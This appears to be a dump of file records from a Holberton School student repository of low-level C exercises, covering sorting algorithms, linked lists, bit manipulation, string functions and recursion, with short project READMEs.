"/0x17-doubly_linked_lists/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### C - Doubly linked lists\n\nThis repository is for learning purposes at Holberton School\n\nGeneral Learning Objectives\n- What is a doubly linked list\n- How to use doubly linked lists\n- Start to look for the right source of information without too much help\n" }, { "alpha_fraction": 0.4982698857784271, "alphanum_fraction": 0.512110710144043, "avg_line_length": 12.30434799194336, "blob_id": "39a7478336ee67d666c264fcfd204374f29009fa", "content_id": "a68702315c178bf25bd0e4457ff630473d1ec79e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 289, "license_type": "no_license", "max_line_length": 49, "num_lines": 22, "path": "/0x05-pointers_arrays_strings/4-print_rev.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_rev - print the given string in reverse.\n * @s: input string.\n *\n */\nvoid print_rev(char *s)\n{\n\tint leng = 0;\n\n\twhile (*(s + leng) != '\\0')\n\t{\n\t\tleng++;\n\t}\n\tleng = leng - 1;\n\twhile (leng >= 0)\n\t{\n\t\t_putchar(*(s + leng));\n\t\tleng--;\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.6055936217308044, "alphanum_fraction": 0.6073059439659119, "avg_line_length": 18.25274658203125, "blob_id": "bfcdfbf83c382a08f1445c22c0c7af42c772fb2b", "content_id": "50dc03982fa95b585c8d705a9a0fa8ed0b3fe3a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1752, "license_type": "no_license", "max_line_length": 71, "num_lines": 91, "path": "/0x1B-sorting_algorithms/101-cocktail_sort_list.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n\n/**\n * swap_backward - swaps the current node with its previous node\n * @cursor: current node position\n * @list: list to sort\n */\nvoid swap_backward(listint_t **cursor, listint_t **list)\n{\n\tlistint_t *current, *next, *prev, *p_p;\n\n\tcurrent = *cursor;\n\tprev = current->prev;\n\tnext = current->next;\n\tp_p = prev->prev;\n\tcurrent->next = prev;\n\tcurrent->prev = p_p;\n\n\tprev->next = next;\n\tnext->prev = prev;\n\tprev->prev = current;\n\tif (p_p)\n\t\tp_p->next = current;\n\tif (current->prev == NULL)\n\t\t*list = current;\n\tcurrent = current->next;\n\tprint_list(*list);\n\t*cursor = current;\n}\n\n/**\n * swap_forward - swaps the current node with its next node\n * @cursor: current node position\n * @list: list to sort\n */\nvoid swap_forward(listint_t **cursor, listint_t **list)\n{\n\tlistint_t *current, *next, *prev, *n_n;\n\n\tcurrent = *cursor;\n\tnext = current->next;\n\tprev = current->prev;\n\tn_n = next->next;\n\tcurrent->next = n_n;\n\tcurrent->prev = next;\n\tif (prev)\n\t\tprev->next = next;\n\tnext->prev = prev;\n\tnext->next = current;\n\tif (n_n)\n\t\tn_n->prev = current;\n\tcurrent = current->prev;\n\tif 
(current->prev == NULL)\n\t\t*list = current;\n\tprint_list(*list);\n\t*cursor = current;\n}\n\n/**\n * cocktail_sort_list - function that sorts a linked list using cocktail sort\n * @list: pointer to first node in linked list\n */\nvoid cocktail_sort_list(listint_t **list)\n{\n\tlistint_t *cursor;\n\tint cont = 1;\n\n\tif (list == NULL || *list == NULL)\n\t\treturn;\n\n\twhile (cont != 0)\n\t{\n\t\tcont = 0;\n\t\tfor (cursor = *list; cursor->next != NULL; cursor = cursor->next)\n\t\t{\n\t\t\tif (cursor->n > cursor->next->n)\n\t\t\t{\n\t\t\t\tswap_forward(&cursor, list);\n\t\t\t\tcont++;\n\t\t\t}\n\t\t}\n\t\tfor (; cursor->prev != NULL; cursor = cursor->prev)\n\t\t{\n\t\t\tif (cursor->n < cursor->prev->n)\n\t\t\t{\n\t\t\t\tswap_backward(&cursor, list);\n\t\t\t\tcont++;\n\t\t\t}\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.3733333349227905, "alphanum_fraction": 0.4457142949104309, "avg_line_length": 18.44444465637207, "blob_id": "98a1e5a9f10372930859db85d986c9d778c52073", "content_id": "f6769be2ae4c248b0b804e5a43d863c10a0d05d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 525, "license_type": "no_license", "max_line_length": 71, "num_lines": 27, "path": "/0x06-pointers_arrays_strings/6-cap_string.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * cap_string - capitalizes all words of a string.\n * @s: given string.\n * Return: the string with capitalized words.\n */\nchar *cap_string(char *s)\n{\n\tint iter, i;\n\tint a[] = {32, 9, 10, 44, 59, 46, 33, 63, 34, 40, 41, 123, 125};\n\n\tfor (iter = 0; s[iter] != '\\0'; iter++)\n\t{\n\t\tfor (i = 0; i < 13; i++)\n\t\t{\n\t\t\tif ((s[iter] == a[i]) && (s[iter + 1] >= 'a' && s[iter + 1] <= 'z'))\n\t\t\t\ts[iter + 1] += 'A' - 'a';\n\t\t\telse\n\t\t\t\tcontinue;\n\t\t}\n\t}\n\tif (s[0] >= 'a' && s[0] <= 'z')\n\t{\n\t\ts[0] += 'A' - 'a';\n\t}\n\treturn (s);\n}\n" }, { "alpha_fraction": 0.7676767706871033, "alphanum_fraction": 0.7676767706871033, "avg_line_length": 37.125, "blob_id": "840e65b6e0eeaa3506471f2edfbb38c185a444f9", "content_id": "94640dc430ece27944cfe171f256d38a4d14940b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 297, "license_type": "no_license", "max_line_length": 85, "num_lines": 8, "path": "/0x1B-sorting_algorithms/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### C - Sorting algorithms & Big O\n\n## General Learning Objectives\n\n- At least four different sorting algorithms\n- What is the Big O notation, and how to evaluate the time complexity of an algorithm\n- How to select the best sorting algorithm for a given input\n- What is a stable sorting algorithm\n" }, 
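As a worked example of the Big O question in the 0x1B README above: bubble sort compares adjacent pairs in two nested loops, so in the worst case it performs (n - 1) + (n - 2) + ... + 1 = n(n - 1)/2 comparisons, which grows as O(n^2); by contrast, algorithms that repeatedly halve the work, like the quick sort and merge sort records in this listing, average O(n log n).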
{ "alpha_fraction": 0.6068702340126038, "alphanum_fraction": 0.6180048584938049, "avg_line_length": 19.959999084472656, "blob_id": "58bb5d5465745e48e017a9e2a967a91eeada5aa1", "content_id": "3856656b26ef5730bf1a93053b43b7aa368d9573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 524, "license_type": "no_license", "max_line_length": 61, "num_lines": 25, "path": "/0x08-recursion/5-sqrt_recursion.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * calc_sqrt - helper that computes the natural square root of a number.\n * @n: input value.\n * @y: candidate root being tested.\n * Return: returns the natural square root of a number.\n */\nint calc_sqrt(int n, int y)\n{\n\tif ((y * y) == n)\n\t\treturn (y);\n\telse if ((y * y) > n)\n\t\treturn (-1);\n\treturn (calc_sqrt(n, (y + 1)));\n}\n\n/**\n * _sqrt_recursion - returns the natural square root of a given number.\n * @n: input value.\n * Return: returns the natural square root of a number.\n */\nint _sqrt_recursion(int n)\n{\n\treturn (calc_sqrt(n, 0));\n}\n" }, { "alpha_fraction": 0.4521739184856415, "alphanum_fraction": 0.469565212726593, "avg_line_length": 16.916666984558105, "blob_id": "8248a3d2c097521af97ce9f3eb54c61781672f3d", "content_id": "90b914fa72d87ea514d0658a5d1ee96b92ec34c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 551, "license_type": "no_license", "max_line_length": 68, "num_lines": 31, "path": "/0x1B-sorting_algorithms/100-shell_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * shell_sort - sorts the array using the Shell sort method and the\n * Knuth sequence\n * @array: array to sort\n * @size: size of array\n */\nvoid shell_sort(int *array, size_t size)\n{\n\tint h = 1, i, j;\n\tint aux = 0;\n\n\twhile (h < ((int)(size)))\n\t{\n\t\th = (3 * h) + 1;\n\t}\n\th = (h - 1) / 3;\n\twhile (h > 0)\n\t{\n\t\tfor (i = h; i < (int)(size); i++)\n\t\t{\n\t\t\tfor (j = i; (j - h) >= 0 && array[j] < array[j - h]; j -= h)\n\t\t\t{\n\t\t\t\taux = array[j];\n\t\t\t\tarray[j] = array[j - h];\n\t\t\t\tarray[j - h] = aux;\n\t\t\t}\n\t\t}\n\t\tprint_array(array, size);\n\t\th = (h - 1) / 3;\n\t}\n}\n" }, { "alpha_fraction": 0.4957983195781708, "alphanum_fraction": 0.5258103013038635, "avg_line_length": 15.019230842590332, "blob_id": "f0852b84c25c52fcab8a853542024cf3ab03dedf", "content_id": "dd6da071313124b169a15d4117d76b79c66de674", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 833, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/0x14-bit_manipulation/5-flip_bits.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * flip_bits - gets the number of bits you would need to flip to get from one\n * number to another.\n * @n: given number 1\n * @m: given number 2.\n * Return: number of bits needed.\n */\nunsigned int flip_bits(unsigned long int n, unsigned long int m)\n{\n\tint i, index, size, res;\n\tunsigned long int small, big, a, p, num1, num2;\n\n\tsize = sizeof(unsigned long int) * 8;\n\ta = 1;\n\tif (n < m)\n\t{\n\t\tsmall = n;\n\t\tbig = m;\n\t}\n\telse\n\t{\n\t\tsmall = m;\n\t\tbig = n;\n\t}\n\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tp = (a << ((size - 1) - i) & big);\n\t\tif (p)\n\t\t{\n\t\t\tindex = (size - 1) - i;\n\t\t\tbreak;\n\t\t}\n\t}\n\tfor (res = 0; index >= 0; index--)\n\t{\n\t\tnum1 = (a << index) & big;\n\t\tnum2 = (a << index) & small;\n\t\tif (num1)\n\t\t\tnum1 = 1;\n\t\telse\n\t\t\tnum1 = 0;\n\t\tif (num2)\n\t\t\tnum2 = 1;\n\t\telse\n\t\t\tnum2 = 0;\n\t\tres += (num1 ^ num2);\n\t}\n\treturn (res);\n}\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6286549568176269, "avg_line_length": 17.52631568908691, "blob_id": "33e7538c6304f9a4358f9a6b34244a8f87f34c43", "content_id": "a8cb53bac3db7d9ba7e92e21d90b5faaecfbaffd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 411, "license_type": "no_license", "max_line_length": 58, "num_lines": 23, "path": "/0x14-bit_manipulation/2-get_bit.c", 
"repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * get_bit - prints the binary representation of a number.\n * @n: given number.\n * @index: binary index.\n * Return: 1 if worked.\n */\nint get_bit(unsigned long int n, unsigned int index)\n{\n\tint a = 1;\n\tunsigned int size;\n\tunsigned long int p;\n\n\tsize = sizeof(unsigned long int) * 8;\n\tif (index > size)\n\t\treturn (-1);\n\tp = (a << index & n);\n\tif (p)\n\t\treturn (1);\n\telse\n\t\treturn (0);\n}\n" }, { "alpha_fraction": 0.4131944477558136, "alphanum_fraction": 0.5104166865348816, "avg_line_length": 10.520000457763672, "blob_id": "fc76542611b9cd4ef407bc557306c7016e6716a6", "content_id": "133cf30a618b8c2237ac935f99e7d77f8a897691", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 288, "license_type": "no_license", "max_line_length": 58, "num_lines": 25, "path": "/0x04-more_functions_nested_loops/100-prime_factor.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n/**\n * main - Prints the largest prime number of 612852475143.\n *\n * Return: always 0.\n */\n\n\nint main(void)\n{\n\tlong int num, i;\n\n\tnum = 612852475143;\n\n\tfor (i = 2; i < num; i++)\n\t{\n\t\tif (num % i == 0)\n\t\t{\n\t\t\tnum /= i;\n\t\t\ti--;\n\t\t}\n\t}\n\tprintf(\"%ld\\n\", i);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.6247654557228088, "alphanum_fraction": 0.6303939819335938, "avg_line_length": 19.5, "blob_id": "77bad32830a5b0b1242dc90a4fa6a79076f5fc19", "content_id": "b6a7630dd52c2ed19f585e199b85421bd0b1a248", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1599, "license_type": "no_license", "max_line_length": 78, "num_lines": 78, "path": "/0x1B-sorting_algorithms/3-quick_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n\n/**\n * swap - change position between two position of an array and print the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid swap(int *array, int first, int last, size_t size)\n{\n\tint aux, value;\n\n\tvalue = array[first];\n\taux = array[last];\n\tarray[last] = value;\n\tarray[first] = aux;\n\tprint_array(array, size);\n}\n/**\n * part - fin the partition position or pivot of the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n * Return: pivot index\n */\nint part(int *array, int first, int last, size_t size)\n{\n\tint pivot = array[last];\n\tint i = first - 1;\n\tint j;\n\n\tfor (j = first; j <= last - 1; j++)\n\t{\n\t\tif (array[j] < pivot)\n\t\t{\n\t\t\ti++;\n\t\t\tif (i < j)\n\t\t\t\tswap(array, i, j, size);\n\t\t}\n\t}\n\tif (array[i + 1] > array[last])\n\t\tswap(array, i + 1, last, size);\n\treturn (i + 1);\n}\n\n/**\n * sorting - sorts an array of integers in ascending order\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid sorting(int *array, int first, int last, size_t size)\n{\n\tint pivot;\n\n\tif (first < last)\n\t{\n\t\tpivot = part(array, first, last, size);\n\t\tsorting(array, first, pivot - 1, size);\n\t\tsorting(array, pivot + 1, last, size);\n\t}\n}\n\n/**\n * quick_sort - sorts an array of integers in ascending order using the Quick\n * sort algorithm using 
Lomuto partition scheme\n * @array: array to sort\n * @size: size of array\n */\nvoid quick_sort(int *array, size_t size)\n{\n\tint last = size - 1;\n\n\tsorting(array, 0, last, size);\n}\n" }, { "alpha_fraction": 0.8604651093482971, "alphanum_fraction": 0.8604651093482971, "avg_line_length": 43, "blob_id": "bce74bf2117c2d8131d720258f1cb7539e6d549d", "content_id": "fce5dafaef6d940b21fcaaafbdf97023c3a29deb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 86, "license_type": "no_license", "max_line_length": 86, "num_lines": 1, "path": "/0x08-recursion/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about recursion, different functions and projects using recursion." }, { "alpha_fraction": 0.5960590839385986, "alphanum_fraction": 0.5985221862792969, "avg_line_length": 17.454545974731445, "blob_id": "08d3b05fc8ae6f85d710a0e74e44c37634447489", "content_id": "b5a134f307a59b06f957a533a339fcbd95a4f87d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 406, "license_type": "no_license", "max_line_length": 52, "num_lines": 22, "path": "/0x07-pointers_arrays_strings/1-memcpy.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _memcpy - copies memory area.\n * @dest: destination memory area.\n * @src: source memory area.\n * @n: number of bytes to copy.\n * Return: pointer to dest.\n */\nchar *_memcpy(char *dest, char *src, unsigned int n)\n{\n\tchar *dest_aux = dest;\n\tchar *src_aux = src;\n\tunsigned int i;\n\n\tfor (i = 0; i < n; i++)\n\t{\n\t\t*dest_aux = *src_aux;\n\t\tdest_aux++;\n\t\tsrc_aux++;\n\t}\n\treturn (dest);\n}\n" }, { "alpha_fraction": 0.5819520950317383, "alphanum_fraction": 0.591160237789154, "avg_line_length": 21.625, "blob_id": "5c4385fcb45e555b85e5e9629df65be9576023dd", "content_id": "f64ded7d75757f0760cb2742326f3352cd9791cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 543, "license_type": "no_license", "max_line_length": 64, "num_lines": 24, "path": "/0x06-pointers_arrays_strings/2-strncpy.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * _strncpy - copies a string\n * @dest: the string to copy to.\n * @src: the string from which up to n characters are copied.\n * @n: maximum number of characters to be copied.\n * Return: pointer to the dest string.\n */\nchar *_strncpy(char *dest, char *src, int n)\n{\n\tint iter_n = 0;\n\n\tfor (iter_n = 0; iter_n < n && src[iter_n] != '\\0'; iter_n++)\n\t{\n\t\tdest[iter_n] = src[iter_n];\n\t}\n\tfor (; iter_n < n; iter_n++)\n\t{\n\t\tdest[iter_n] = '\\0';\n\t}\n\treturn (&(*dest));\n}\n" }, 
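A small demonstration of the '\0' padding behavior in the _strncpy record above (hypothetical main; the prototype is assumed from holberton.h):

#include <stdio.h>

char *_strncpy(char *dest, char *src, int n); /* assumed prototype */

int main(void)
{
	char dest[10] = "XXXXXXXXX";

	_strncpy(dest, "Hi", 5);
	printf("%s\n", dest);    /* prints Hi */
	printf("%d\n", dest[4]); /* prints 0: byte padded with '\0' */
	return (0);
}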
"#include \"holberton.h\"\n/**\n * print_triangle - Prints a triangle from the size value.\n * @size: is the size of the triangle, defined the by input.\n */\n\nvoid print_triangle(int size)\n{\n\tchar a = 35, x, y, z, w;\n\n\tif (size > 0)\n\t{\n\t\tfor (y = size; y > 0; y--)\n\t\t{\n\t\t\tfor (x = 0; x < (y - 1); x++)\n\t\t\t{\n\t\t\t\t_putchar(' ');\n\t\t\t}\n\t\t\tw = size - x;\n\t\t\tfor (z = 0; z <= (w - 1); z++)\n\t\t\t{\n\t\t\t\t_putchar(a);\n\t\t\t}\n\t\t\t_putchar('\\n');\n\t\t}\n\t}\n\telse\n\t{\n\t\t_putchar('\\n');\n\t}\n}\n" }, { "alpha_fraction": 0.6280701756477356, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 19.35714340209961, "blob_id": "257620b9415ec80baa8988851ae650ed4356db8b", "content_id": "979cc46083994110d77ad88bafaccfea6fc6e248", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 285, "license_type": "no_license", "max_line_length": 77, "num_lines": 14, "path": "/0x17-doubly_linked_lists/1-dlistint_len.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * dlistint_len - returns the number of elements in a linked dlistint_t list.\n * @h: given list.\n * Return: number of nodes.\n */\nsize_t dlistint_len(const dlistint_t *h)\n{\n\tint elements = 0;\n\n\tfor (; h != NULL; h = h->next, elements++)\n\t\t;\n\treturn (elements);\n}\n" }, { "alpha_fraction": 0.6707317233085632, "alphanum_fraction": 0.6975609660148621, "avg_line_length": 17.68181800842285, "blob_id": "2dac9bb36d4cd3ee2ee94bdec4623f3492c3d429", "content_id": "797c575d280352bf589e0ce2d712c7d6aef94920", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 410, "license_type": "no_license", "max_line_length": 75, "num_lines": 22, "path": "/0x12-singly_linked_lists/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### Singly linked lists\n\nThis repository contain the files for the project about singly linked lists\n\n### General learning objectives\n- When and why using linked lists vs arrays\n- How to build and use linked lists\n\n### files\n- 0-print_list.c<br>\n- 1-list_len.c<br>\n- 2-add_node.c<br>\n- 3-add_node_end.c<br>\n- 4-free_list.c<br>\n- 100-first.c<br>\n- 101-hello_holberton.asm<br>\n- lists.h\n\n###AUTHOR\nDavid Peralta\n\nHOLBERTON SCHOOL" }, { "alpha_fraction": 0.48932039737701416, "alphanum_fraction": 0.5126213431358337, "avg_line_length": 15.09375, "blob_id": "ecfeda5c2c639c1e7d62495dd762bf01ae9dad38", "content_id": "19ea97ece3a6586253461a3c8ece1399824ad6cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 515, "license_type": "no_license", "max_line_length": 63, "num_lines": 32, "path": "/0x14-bit_manipulation/1-print_binary.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * print_binary - prints the binary representation of a number.\n * @n: given number.\n */\nvoid print_binary(unsigned long int n)\n{\n\tint flag = 0;\n\tunsigned long int a = 1;\n\tint b, i;\n\tint size;\n\tunsigned long int p;\n\n\tif (n == 0)\n\t{\n\t\t_putchar('0');\n\t\treturn;\n\t}\n\tsize = sizeof(unsigned long int) * 8;\n\tfor (i = 0; i < size; i++)\n\t{\n\t\tp = ((a << ((size - 1) - i)) & n);\n\t\tif (p >> ((size - 1) - i))\n\t\t\tflag = 1;\n\t\tif (flag)\n\t\t{\n\t\t\tb = p >> ((size - 1) - i);\n\t\t\t_putchar(b 
+ 48);\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5569548010826111, "alphanum_fraction": 0.5621064901351929, "avg_line_length": 18.585105895996094, "blob_id": "94abcc655841bf92875653a2a2785ff52648152a", "content_id": "335bfb1d3c7d453eca7a4eae6968226234c25b7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1747, "license_type": "no_license", "max_line_length": 68, "num_lines": 94, "path": "/0x1B-sorting_algorithms/103-merge_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * merging - merges a left and a right run of array into copy\n * @array: first array\n * @copy: copy of array, and second array\n * @posi: initial position\n * @middle: middle position, one past the end of the left run and the\n * first index of the right run\n * @size: end index (exclusive) of the right run\n */\nvoid merging(int *array, int posi, int middle, int size, int *copy)\n{\n\tint i, j, k;\n\n\ti = posi;\n\tj = middle;\n\tprintf(\"Merging...\\n\");\n\tprintf(\"[left]: \");\n\tfor (k = i; k < j; k++)\n\t{\n\t\tif (k != j - 1)\n\t\t\tprintf(\"%d, \", array[k]);\n\t\telse\n\t\t\tprintf(\"%d\\n\", array[k]);\n\t}\n\tprintf(\"[right]: \");\n\tfor (k = j; k < size; k++)\n\t{\n\t\tif (k != size - 1)\n\t\t\tprintf(\"%d, \", array[k]);\n\t\telse\n\t\t\tprintf(\"%d\\n\", array[k]);\n\t}\n\tprintf(\"[Done]: \");\n\tfor (k = i; k < size; k++)\n\t{\n\t\tif (i < middle && (j >= size || array[i] <= array[j]))\n\t\t{\n\t\t\tcopy[k] = array[i];\n\t\t\ti++;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tcopy[k] = array[j];\n\t\t\tj++;\n\t\t}\n\t\tif (k != size - 1)\n\t\t\tprintf(\"%d, \", copy[k]);\n\t\telse\n\t\t\tprintf(\"%d\\n\", copy[k]);\n\n\t}\n}\n/**\n * partition - recursively splits the range and merges the halves\n * @copy: copy of array\n * @posi: initial position\n * @size: end index (exclusive) of the range\n * @array: original array\n */\nvoid partition(int *copy, int posi, int size, int *array)\n{\n\tint middle;\n\n\tif (size - posi < 2)\n\t\treturn;\n\n\tmiddle = (size + posi) / 2;\n\n\tpartition(array, posi, middle, copy);\n\tpartition(array, middle, size, copy);\n\n\tmerging(copy, posi, middle, size, array);\n}\n/**\n * merge_sort - creates the copy and sends it to partition\n * @array: array\n * @size : size of array\n */\nvoid merge_sort(int *array, size_t size)\n{\n\tint *copy, i;\n\n\tcopy = malloc(sizeof(int) * size);\n\n\tif (!copy)\n\t\treturn;\n\n\tfor (i = 0; i < (int)size; i++)\n\t\tcopy[i] = array[i];\n\n\tpartition(copy, 0, size, array);\n\tfree(copy);\n}\n" }, 
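A minimal driver for the merge_sort record above; a sketch assuming sort.h declares merge_sort and print_array the way the other 0x1B records use them (this main is hypothetical):

#include "sort.h"

int main(void)
{
	int array[] = {19, 48, 99, 71, 13, 52, 96, 73};
	size_t n = sizeof(array) / sizeof(array[0]);

	print_array(array, n);
	merge_sort(array, n); /* prints each Merging... step */
	print_array(array, n);
	return (0);
}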
a++)\n\t\t\t\t{\n\t\t\t\t\tputchar(x);\n\t\t\t\t\tputchar(y);\n\t\t\t\t\tputchar(' ');\n\t\t\t\t\tputchar(z);\n\t\t\t\t\tputchar(a);\n\t\t\t\t\tif (!(x == '9' && y == '8' && z == '9' && a == '9'))\n\t\t\t\t\t{\n\t\t\t\t\t\tputchar(',');\n\t\t\t\t\t\tputchar(' ');\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tputchar('\\n');\n\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.5009596943855286, "alphanum_fraction": 0.5201535224914551, "avg_line_length": 16.366666793823242, "blob_id": "7d179f8aef35a851715be5b80c076a173af7e0ef", "content_id": "0e2a7b2990b837b1c3842d3ccb5c507d556d1885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 521, "license_type": "no_license", "max_line_length": 66, "num_lines": 30, "path": "/0x1B-sorting_algorithms/0-bubble_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * bubble_sort - function that sorts an array using bubble sorting\n * @array: array to sort\n * @size: size of the array\n * Return: Nothing\n */\nvoid bubble_sort(int *array, size_t size)\n{\n\tint cont = 1, aux = 0;\n\tsize_t i, j;\n\n\tfor (j = 0; j < size; j++)\n\t{\n\t\tcont = 0;\n\t\tfor (i = 0; i < size - 1; i++)\n\t\t{\n\t\t\tif (array[i] > array[i + 1])\n\t\t\t{\n\t\t\t\tcont++;\n\t\t\t\taux = array[i];\n\t\t\t\tarray[i] = array[i + 1];\n\t\t\t\tarray[i + 1] = aux;\n\t\t\t\tprint_array(array, size);\n\t\t\t}\n\t\t}\n\t\tif (cont == 0)\n\t\t\tbreak;\n\t}\n}\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.628654956817627, "avg_line_length": 21.799999237060547, "blob_id": "ed281fc4af3450e1ad29adea31b389de2ec83ec5", "content_id": "6daa5541bf0ce0befaf13d1cf51f050a22f3de71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 342, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/0x06-pointers_arrays_strings/103-print_buffer.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * print_buffer - prints the length of the string and the size of the buffer.\n * @b: pointer to string\n * @size: size of buffer.\n */\nvoid print_buffer(char *b, int size)\n{\n\tint leng_1;\n\n\tfor (leng_1 = 0; b[leng_1] != '\\0'; leng_1++)\n\t\t;\n\tprintf(\"Length of string: %d, size of the buffer: %d\\n\", leng_1, size);\n}\n" }, { "alpha_fraction": 0.5621181130409241, "alphanum_fraction": 0.5702647566795349, "avg_line_length": 15.366666793823242, "blob_id": "49e687a0132cd1bf3d48b76f68f7df68b164cc30", "content_id": "ac8eba9b47d513717e8828c4fa5c845f1503e50d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 491, "license_type": "no_license", "max_line_length": 75, "num_lines": 30, "path": "/0x0B-malloc_free/1-strdup.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * _strdup - creates new space in memory that contains a copy of a string\n * @str: given string.\n * Return: Pointer to allocated memory.\n */\nchar *_strdup(char *str)\n{\n\tchar *cpy_ar;\n\tunsigned int i, cp;\n\n\tif (str == NULL)\n\t\treturn (NULL);\n\n\tfor (i = 0; str[i] != '\\0'; i++)\n\t\t;\n\n\tcpy_ar = malloc((i + 1) * sizeof(char));\n\n\tif (cpy_ar == NULL)\n\t\treturn (NULL);\n\n\tfor (cp = 0; cp <= i; cp++)\n\t{\n\t\tcpy_ar[cp] = str[cp];\n\t}\n\n\treturn 
(cpy_ar);\n}\n" }, { "alpha_fraction": 0.5252525210380554, "alphanum_fraction": 0.5353535413742065, "avg_line_length": 15.5, "blob_id": "e15822fa29003304cb67728072e17aeed7c39080", "content_id": "38edcce2c855178706e034a05af7a1c3998e7638", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 297, "license_type": "no_license", "max_line_length": 68, "num_lines": 18, "path": "/0x02-functions_nested_loops/4-isalpha.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _isalpha - Verifies if a variable is a lowercase or uppercase letter.\n * @c: variable for value input.\n * Return: 1 when c is a letter, 0 otherwise.\n */\n\nint _isalpha(int c)\n{\n\tif ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z'))\n\t{\n\t\treturn (1);\n\t}\n\telse\n\t{\n\t\treturn (0);\n\t}\n}\n" }, { "alpha_fraction": 0.6082473993301392, "alphanum_fraction": 0.6116838455200195, "avg_line_length": 19.785715103149414, "blob_id": "195cd091cae6477b9e8b46295bfe691701d2b742", "content_id": "ffeeb801a55a7ca36708098d4093742a600ee1e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 291, "license_type": "no_license", "max_line_length": 61, "num_lines": 14, "path": "/0x17-doubly_linked_lists/0-print_dlistint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include 